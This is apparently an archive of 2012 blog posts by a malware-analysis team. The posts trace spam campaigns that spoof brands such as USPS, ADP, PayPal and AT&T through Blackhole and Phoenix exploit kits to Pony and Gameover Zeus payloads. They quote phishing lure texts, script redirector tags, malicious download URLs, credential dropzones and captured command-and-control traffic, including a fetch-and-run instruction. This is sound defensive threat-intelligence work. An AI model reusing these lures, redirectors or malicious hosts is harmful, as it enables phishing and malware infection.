Author Archives: spamalysis

ADP Funding Notification – Debit Draft

Weve been quiet recently, but we havent stopped our work. Behind the scenes weve been developing some new tools and techniques that we hope will enable us to more efficiently track the bad guys. We used some of these new tools and techniques in our analysis of a new spam run today that spoofed communications from ADP. We observed spam messages with the subject line “ADP Funding Notification – Debit Draft”. The spam sample we analyzed was sent from 78.96.173.243 – a known Cutwail spambot.

The link in this message directed victims to junnioreadriano.com.br/MZ0PnMj5/index.html. Note that our bad guys are still using the same /8-random-character/index.html pattern. This page contained the following two malicious javascript redirectors:

http://ftp.leocardz.com/BhSFTbq9/js.js
http://www.webondemand.altervista.org/V4uags9T/js.js

These javascripts redirector victims to a Blackhole Exploit kit at 50.116.38.183. This Blackhole exploit kit was hosting at least 9 different malicious payloads. Detected malware payloads identified by MD5 hash included the following:

ce03b87d1d10e76526883077d3924528
937b44fbb5fec18f53c6de60a801d8ed
13fd74a6dc4f1e8e952ea2bc692ede5e
58859d47ccd39461a52a9455f3b0a8ac
9af1128108aac221fd16ddc213c8147a
48a5cd662c66fcdf3ee96ea2126096c7
a08780b691232573e9895589b7f0b76f
1b1bbf726902beb3b25d11fbdc58720f
ededc8b9d03ded0cb7818dc2ef72ad4c

All of these binaries appear, upon initial inspection, to be Pony downloaders.

Advertisements

Contact to the nearest post office

On 2012-04-26 we observed a round of USPS flavored spam. We analyzed a spam message with the subject line “Contact to the nearest post office “. The full message was as follows:

Notification, 

We couldn’t deliver your parcel at your address. 

Reason deny: Postal code contains an error. 
LOCATION OF YOUR PARCEL:Des Moines 
STATUS OF YOUR ITEM: sort order 
SERVICE: Expedited Shipping 
Parcel number:U171553881 NU 
FEATURES: Yes 

The label of your parcel is enclosed to the letter. 
You should print the label and show it in the nearest post office to 
get a parcel. 

Important information! 
If the parcel isn’t received within 30 working days our company will 
have the right to claim compensation from you for it’s keeping in the 
amount of $12.28 for each day of keeping of it. 

You can find the information about the procedure and conditions of 
parcels keeping in the nearest office. 

Thank you for attention. 
USPS Express Services. 

Attached to this spam was the following zip archive:

File: Label_Parcel_USPS.NR_213-7004.zip
Size: 24725
MD5: 21464652804DE3916D755C75286AD5C4

This zip archive contained the following malicious downloader:

File: Label_Parcel.exe
Size: 26112
MD5: B37B8B306E9D2C1EEED0FB71C32E1657

This downloader was installed on the victim filesystem in the following location C:\Documents and Settings\Administrator\Local Settings\Application Data\urlmon.exe.

This downloader sent the following GET request to a control server at  everkosmo2012.ru:

GET /ab/index.php?r=gate&id=d0ef7554&group=24.04.2012_a&debug=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: everkosmo2012.ru

The control server returned the following response:

HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Thu, 26 Apr 2012 12:52:08 GMT
Content-Type: text/html
Content-Length: 44
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze8
Vary: Accept-Encoding

run=http://www.baracademie.ca/_notes/ddd.exe

The downloader parsed the run= command and then downloaded the following executable from http://www.baracademie.ca/_notes/ddd.exe:

File: ddd.exe
Size: 579586
MD5: C64A7822CBF2EBA42D911B4F9E7C5D78

This executable is the same type of Office document stealer previously discussed in our American Airlines Ticket Attachment post. This Office document stealer variant POSTs stolen documents to everkosmo2012.ru over port 8000.

The initial downloader then sent a second GET request to the control server at everkosmo2012.ru. The control server responded, instructing the downloader to grab a secondary malware executable from http://www.baracademie.ca/_notes/mmm.exe. This executable was an Asprox spambot. It had the following properties:

File: mmm.exe
Size: 237056
MD5: 650912C5F2763F55196616B76D880CAD

This Asprox spambot retrieved its configuration file via the following POST request to a control server at illinoisnot.ru:

POST /wet.php HTTP/1.1
Host: illinoisnot.ru:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 746

The configuration file included a spam template to be used in spamming operations. The downloaded spam template was as follows:

Message-ID: <%%MSGID%%>
From: %%FROM%%
To: <%%RCPT%%>
Subject: %%SUBJ%%
Date: %%DATE%%
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=”%%BND:1%%”
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

The configuration file instructed the Asprox bot to spam additional USPS-themed messages.

We noted that the domain illinoisnot.ru resolved to 81.17.24.72. This IP previously hosted other suspect domains including:

  • luxas87612.ru
  • bristol1883314.ru
  • equator991534.ru
  • ocean8838354.ru
  • chukchi293494.ru
  • chart71445.ru
  • chart71445.ru
  • kiribati23547.ru
  • united55658.ru
  • surero14568.ru
  • virific2012b.ru

We know that at least the bristol1883314.ru domain hosted a Smoke Loader control server.

Confirm your US airways online reservation

On 2011-04-09 we observed an interesting round of US Airways spam. The sample we analyzed had a subject line of “Confirm your US airways online reservation”.

While this same template had been previously used in high-profile Gameover Zeus laden spam campaigns, this particular campaign was a bit different. The sample we analyzed had a link to a malicious page at go2gamers.com/us.html. Other spam samples from the same campaign had links to hacked websites with malicious us.html pages.

The malicious us.html page contained javascript that redirected victims to a Blackhole Exploit Kit at bamboozlefitclub.net/main.php?page=745b81e2608709b2.  The bamboozlefitclub.net domain resolved to 85.189.11.134.

This Blackhole kit dropped a Bugat* payload with the following properties:

File: about.exe
Size: 71680
MD5: D1455B0C28A145C5D207F276F945ABCA

Unlike other Bugat payloads that weve documented here that used a domain generation algorithm to determine its command and control server, this variant was hardcoded to connect to 4 domains for command and control instructions. This variant was configured to connect to the following:

scanforsecurytyholes.ru
testnosecurity.ru
securytycheckme.ru
krjjfgzzzooooem.ru

The scanforsecurytyholes.ru and securytycheckme.ru are currently offline. The other domains 91.201.4.142. After this variant successfully connected to the first available command and control server, in this case testnosecurity.ru/mev/in, it downloaded a configuration file that included a target list of over 400 websites. The vast majority of these targets were financial institutions. If youd like a copy of the target list hit us up at spamalysis@gmail.com.

The downloaded configuration file also revealed the location of the the domains hosting web injects. Bugat, and other banking malware, use web injects to dynamicly man-in-the-middle a victims online banking session. Basically, when a victim logs into their bank’s website these web injects will take control of their session and steal the victim’s banking information in real-time. The webinjects used by this Bugat variant were pulled from http://lavonoplanet.ru/mev/in/cp.php. The domain lavonoplanet.ru resolved to 91.201.4.142.

In addition to providing a configuration file, the command and control server at testnosecurity.ru also pushed a Bugat update on its victims. This updated Bugat payload had the following properties:

Size: 75271
MD5: 0386F4D83DD84D2F60352E00D3F504A6

This updated variant was configured to connect to the following command and control servers:

securytycheckme.ru
sexnotincity.ru

The domain securytycheckme.ru was offline, but the domain sexnotincity.ru resolved to 91.201.4.143. It seems like these guys like to host their domains in the same neighborhood. Mental note … stay out this /24.

The updated Bugat variant pulled its webinjects from the following domains:

http://gloogle.in/mev/in/cp.php
https://meredianstatserv.com/aqweb/in.php

We apologize for not reporting on this one sooner but unfortunately our real lives got in the way this week.

* note, what we call Bugat others call Feodo or Cridex.

Re: Fwd: Wire Transfer Confirmation (FED REFERENCE 2862ZO31)

On 2012-04-11 we observed a NACHA-themed spam email with the subject line “Re: Fwd: Wire Transfer Confirmation (FED REFERENCE 2862ZO31)”. The spam sample we analyzed was sent from 186.46.122.162. This IP is a node in a Cutwail spambot.

This spam sample contained a malicious link to http://www.arydan.pl/page-15.htm. It appears the the www.arydan.pl is an otherwise legitimate site that was hacked. The spammers placed page-15.html in the webroot directory of this compromised site. We were able to locate other hacked that also contained a malicious page-15.htm. Other hacked sites included:

http://www.brochurepedia.nl/page-15.htm
http://www.mocvi.ge/page-15.htm
panda-roux.fr/page-15.htm

While there were likely many other hacked sites, the page-15.htm file appears to be a good indicator for this particular campaign. Unfortunately, this indicator is likely to be short lived and the spammers will almost certainly alter this pattern in future attacks.

The malicious page-15.htm files contained malicious javascript that redirected victims to a Phoenix Exploit kit at webmastaumuren.ru:8080/img/?promo=nacha. It is worth noting that this Phoenix Kit at webmastaumuren.ru imports content from the legitimate nacha.org website in an effort to construct a well designed phishing websites. We previously saw this same technique in an earlier NACHA-themed campaign on 2012-02-28.

This exploit kit in turn handed victims off to another exploit kit at dedovshinaus.su:8080/pages/dq.php?i=8. The kit at dedovshinaus.su drops the following Gameover Zeus variant on its victims:

Size: 301096
MD5: C23C96D34C2D408E20C24F07DFE8E078

Victims that clicked on the report-ACH285369733632711US.exe link in the NACHA phishing site also downloaded the same Gameover Zeus variant (i.e. the same Md5 hash). This payload was digitally signed with a certificate labeled ‘t9H2RXj1BlhxLEQ’.

This Gameover variant had a botid of mf222a11. The operators of this campaign controlled victims via a proxy server at 200.58.99.114 over port 443. This is the same proxy server used in the BillMeLater spam campaign seen earlier today.

Important Information About Your Account

The spammers sure are busy. Today, 2012-04-11, we observed a new spam template spoofing communications from BillMeLater.com – a PayPal service. The spam sample we analyzed had a subject line of “Important Information About Your Account”.

The observed sample contained a malicious link to pe04.com.br/gMsyk6kT/index.html. This page contained the following javascript redirector:

<script type=”text/javascript” src=”http://axislegal.com.au/gcq37VtM/js.js”></script&gt;

The above javascript redirected victims to a Blackhole Exploit Kit at http://209.59.219.231/showthread.php?t=d7ad916d1c0396ff.

This kit dropped a number of different exploits including the latest and greatest Java Exploit CVE-2012-0507. This malicious .jar file had the following properties:

File: Klot.jar
Size: 15719
MD5: 26720F0252EB91BB7A326375313651F9

The kit also dropped a Gameover Zeus variant with the following properties:

Size: 301096
MD5: 5CE366E6D7A949552AF10C4DEAF47506

The Gameover variant had a botid of NRa11. The criminals responsible for this campaign utilized a proxy at 200.58.99.114 to control victims infected with this Gameover variant.

Your Flightticket

On Monday April 9, 2012, we examined a spam email with the subject line “Your Flightticket”. This spam message contained the following text:

Dear Customer,

FLIGHT NUMBER 3702-5114295

DATE/TIME : APRIL 16, 2011, 17:16 PM
ARRIVING AIRPORT: NEW-YORK AIRPORT
PRICE : 3872.58 USD

Your bought ticket is attached to the letter as a scan document (Internet Exlporer File).

To use your ticket you should print it.

Nelda Sharpe,

The attached zip file had an MD5 of b9502c28044ad8335beca132c3c81b12. The zip file contained an html file. This html file contained malicious javascript that redirected victims to a Phoenix Exploit kit at 112.78.124.115:8080/navigator/jueoaritjuir.php. Victims were then redirected to a second Phoenix Exploit kit at engineofsovjets.su:8080/navigator/frf3.php?i=8.

The Phoenix kit at engineofsovjets.su dropped a Pony downloader with the following properties:

File: dsarcubqinhsjqkugsbm.exe
Size: 147496
MD5: E6F5310AC836E48C3B4181E1C00CE4CD

This Pony downloader was signed with a digital certificate labeled “4mb5gWTlIemu0h0”.

This Pony downloader was configured to send stolen FTP and other web admin credentials to dropzones at:

http://www.alberghi.com:8080/pony/gate.php
http://buyandsmile.atomclick.co:8080/pony/gate.php

This Pony downloader was also configured to download a Gameover Zeus payload from the following locations:

http://contabilidadesr.com.br/1mmF86V8/Vdqu.exe
http://www.vandenboschelektro.be/vgwCwvDs/Y9fNYJCs.exe
http://geovanabauerdocesfinos.com.br/6md3zev5/hQj.exe

This Gameover Zeus variant had the following properties:

Size: 305704
MD5: 01D994DF6DBDA4F49E8A6D9CB0005485

This Gameover variant had a botid of mf222a10. Oh yeah, it was also signed with the same digital cert – “4mb5gWTlIemu0h0”.

Where have we seen that digital cert before? Oh yeah, the Newegg.com-themed campaign from April 9, 2012 also signed its Pony and Zeus payloads with the same digital certificate.

This fact is significant because the Newegg campaign leveraged a Blackhole Exploit Kit infrastructure whereas the Flightticket-themed campaign leveraged a Pheonix Exploit kit-themed infrastructure. While these campaign leverage different exploit kit infrastructures it seems clear that they are related as they are dropping the same malware families and are signing payloads with the same digital certificates.

Newegg.com – Payment Charged

On 2012-04-09 we observed a Newegg.com-themed spam template. The spam message that we observed had a subject line of “Newegg.com – Payment Charged” and was sent from a Cutwail spambot.

The observed spam contained a malicious link to http://game.knightscricket.co.za/SpwNjjYt/index.html. There were likely other Newegg.com-themed spam messages associated with this campaign that contained different malicious links and had different subject lines.

The above malicious page, http://game.knightscricket.co.za/SpwNjjYt/index.html, contained the following javascript redirectors:

<script type=”text/javascript” src=”http://congress-assistants.fi/idm2TZP1/js.js”></script&gt;
<script type=”text/javascript” src=”http://primasaleorganik.com/3N6zKxSS/js.js”></script&gt;

These javascript redirectors bounced victims to an exploit kit at http://216.224.182.94/showthread.php?t=d7ad916d1c0396ff.

This exploit kit dropped a Pony downloader with the following properties:

Size: 147496
MD5: DFDA409D8BCC7CDDBBB39A40E388E8BA

This Pony downloader was signed with a digital certificate labeled “4mb5gWTlIemu0h0”.

This Pony downloader was configured to send stolen FTP and other wed admin credentials to dropzones at:

http://www.alberghi.com:8080/pony/gate.php
http://buyandsmile.atomclick.co:8080/pony/gate.php

Hrm, notice that the domain alberghi.com, home to a Pony drop in this campaign, was also home to a Blackhole Exploit kit in a previous American Express-themed spam campaign.

The above Pony downloader, DFDA409D8BCC7CDDBBB39A40E388E8BA, was also configured to download a Gameover Zeus payload from the following locations:

http://finskiydom.com.ua/JdS.exe
http://developerspk.com/DeYhzGj.exe
http://mestraimoveis.com.br/0Ev34x.exe
http://www.bmsevero.com.br/J1eGwcP.exe

This Zeus payload had the following properties:

Size: 305704
MD5: D76F25DF18F89830323CD6DECD657574

Interesting … this Zeus payload was signed with the same digital cert as the above Pony downloader. The Zeus payload’s digital cert had the same “4mb5gWTlIemu0h0” label.

This Zeus variant had a botid of “NRa10”.

Your AT&T wireless bill is ready to view

On 2012-04-03 we observed another new spam template circulating in the wild. This spam template spoofed communications from AT&T Wireless. I guess the Verizon Wireless spam campaigns weve seen in the last few weeks were a success and the spammers behind these attacks decided to try out a new brand. The AT&T Wireless spam template that we analyzed had a subject line of “Your AT&T wireless bill is ready to view”.

The spam message that we analyzed was loaded with malicious links. These links were as follows:

Each spam message associated with this campaign likely contains a different assortment of malicious links. The common characteristic of all these malicious links is that they all contain a random set of 8 alpha-numeric characters in the URI path. This identifier has remained consistent across all the different spam templates associated with this particular campaign.

The malicious pages above hosted the following javascript redirectors:

Note that these javascript redirectors also contained the same pattern of 8 alpha-numeric characters in the URI path.

These javascripts redirected victims to a Blackhole Exploit kit at http://174.140.171.100/showthread.php?t=d7ad916d1c0396ff.

As with the previous Blackhole Exploit kits weve documented on this blog, this exploit kit targets an assortment of PDF, Flash, MSFT, and Java vulnerabilities. These most effective exploit code hosted at this and other Blackhole kits used in this ongoing campaign appears to be the Java Atomic Exploit which targets CVE-2012-0507. This exploit was hosted on the Blackhole Exploit kit at 174.140.171.100 as a .jar file with the following properties:

File: Pol.jar
Size: 14314
MD5: 8050B15A9D6A530BBADC564813BCB2EB

This .jar file was only detected by 2 of 41 AV Vendors on Virustotal.

The Blackhole Exploit Kit at http://174.140.171.100/showthread.php?t=d7ad916d1c0396ff dropped the following Pony downloader on vulnerable victims:

File: contacts.exe
Size: 95272
MD5: FFDC8980585A48DF7B63388A1B3C3642

This Pony variant was configured to send stolen FTP and other web admin credentials to dropzones at”

We know that 91.121.178.156 was previously home to a Blackhole Exploit Kit. We know because urlQuery.net told us. While the domain subdatapro.com is not currently on our radar, we would not be surprised if it served a Blackhole Exploit Kit in the not too distant future.

The Pony variant (FFDC8980585A48DF7B63388A1B3C3642) was also configured to download a Gameover Zeus variant from the following locations:

This Gameover Zeus variant had the following properties:

Size: 296488
MD5: 54A3D8C0F15E16655CAF35306EFC87E5

This variant had a botid of NRa3. The criminals behind this campaign utilized a proxy at 77.43.1.67:443 to control victims infected with this Gameover variant.

Check from Christian Liberty Financial

On 2012-04-02 we observed a spam email via Cisco’s Security Intelligence Operations with the subject line “Check from Christian Liberty Financial, Mon, 2 Apr 2012 12:33:29 +0100”.

This spam message contained the following body:

Advance Notice
|
Enter this code:
SODK2YP7-EO7O-BIVU-8395-4NVDN6VX6O1S
Pay-day Application Enclosed – Please Review
Money Today
Today Only!
1023
Payble to:
*******
amount:
5000.00
—————— AXLB1KQE-IFB0-KP39-C84Y-QRFSYWDQLW61 ——————————————-
Dollars
Money for:
Bills, Shopping, Vacation, Rent, Anything
***** For Immediate Processing Refer to Attached Instructions*****
CAN-SPAM Compliant
E.M.G.
341 Raven Circle
Wyoming, DE 19934

This spam message had a .zip file attached with the filename Your_Check_Details-8857777_042012.zip. This .zip file contained a malicious executable with the following properties:

File: Your_Check_Details_042012.exe
Size: 149504
MD5: A6D4F87E65359ACBB1640611D36E4685

This malicious executable is an ICE IX Zeus variant. This ICE IX Zeus variant communicates with a command and control server at bluesbars.ru via the following POST request:

POST /lampard.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727)
Host: bluesbars.ru
Content-Length: 77
Cache-Control: no-cache

The command and control server was configured to return an encrypted configuration file with the filename “setusating.bin”. During testing the server did not return this file.

It is worthwhile to note that the control server at bluesbars.ru was hosted on a fast flux infrastructure. Via centralops.net we see that bluesbars.ru had an A record with a TTL of 300 seconds and currently resolved to both 217.24.246.7 and 60.19.30.135. This particular fast flux infrastructure is the same infrastructure that was used in the previous spam campaign documented in our post “Triple Barrel Spam Cannon“.

You sent a payment

The spam hits kept a rollin’ today. On 2012-04-02 we observed a Paylpal-themed spam campaign.

The spam sample that we analyzed had a subject line of “You sent a payment.” This sample contained the following malicious links:

The malicious pages contained the following javascript redirectors:

<script type=”text/javascript” src=”http://hirochan.boo.jp/7PMiDL3p/js.js”></script&gt;
<script type=”text/javascript” src=”http://renovation-nantes.com/NCAsBwpU/js.js”></script&gt;
<script type=”text/javascript” src=”http://ncworld.in/bgGdzvBh/js.js”></script&gt;

The javascripts redirected victims to a Blackhole Exploit Kit at http://50.56.223.113:8080/showthread.php?t=d7ad916d1c0396ff.

Note that we previously saw the the IP 50.56.223.113 used as a dropzone for the Pony downloader variant used in the attack documented in our post US Airways online check-in. This is a pattern weve observed in the past were IPs were used both to host Blackhole Exploit kits and Pony downloader drop zones.

The Blackhole kit at 50.56.223.113 dropped a Pony downloader variant with the following properties:

File: info.exe
Size: 94761
MD5: C150FCEA73F3B2904BBEBE0E601B53AC

This Pony downloader variant was configured to send stolen FTP and web admin credentials to the following dropzeons:

http://50.56.223.113:8080/pony/gate.php
http://91.121.178.156:8080/pony/gate.php

The Pony variant also downloaded a Gameover Zeus variant from the following locations:

http://haine-fashion.ro/bLXJU5o.exe
http://hermanosbrando.es/8xsfW5.exe
http://confeitariadossonhos.com.br/Wo4RUjB.exe

The Gameover variant had the following properties:

Size: 297512
MD5: 1E3AA9BCFB6300F426030532821525EA

This variant had a botid of “NRa3”. Note that the day counter in the botid had been incremented to 3. This is significant because we analayzed this sample at approximately 8pm EDT on 2012-04-02. That the botid had be incremented to 3 suggests that the bot was compiled in and distributed from a different timezone … perhaps somewhere in Europe?